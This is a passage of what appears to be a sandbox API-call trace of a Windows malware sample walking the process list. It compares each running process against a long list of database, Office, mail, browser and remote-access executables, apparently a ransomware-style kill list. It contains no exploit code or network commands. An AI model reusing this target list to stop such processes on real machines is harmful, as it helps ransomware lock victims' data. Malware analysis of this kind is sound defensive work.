[0112.743] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.744] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.744] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.745] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, 
ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.745] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.745] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, 
thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.746] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.747] lstrcmpiW (lpString1="audiodg.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, 
TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.747] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.747] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.748] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.748] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.748] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.749] lstrcmpiW (lpString1="dwm.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, 
ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.750] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.750] lstrcmpiW (lpString1="explorer.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, 
MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.750] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.751] lstrcmpiW (lpString1="spoolsv.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, 
POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.764] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.765] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.765] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskhost.exe")) returned 1 [0112.766] lstrcmpiW (lpString1="taskhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.766] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.767] lstrcmpiW (lpString1="taskeng.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, 
mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.768] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="drama wide.exe")) returned 1 [0112.768] lstrcmpiW (lpString1="drama wide.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, 
PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.769] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter_path.exe")) returned 1 [0112.770] lstrcmpiW (lpString1="letter_path.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, 
Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.770] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alpha cornwall peripheral.exe")) returned 1 [0112.770] lstrcmpiW (lpString1="alpha cornwall peripheral.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.771] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="vi 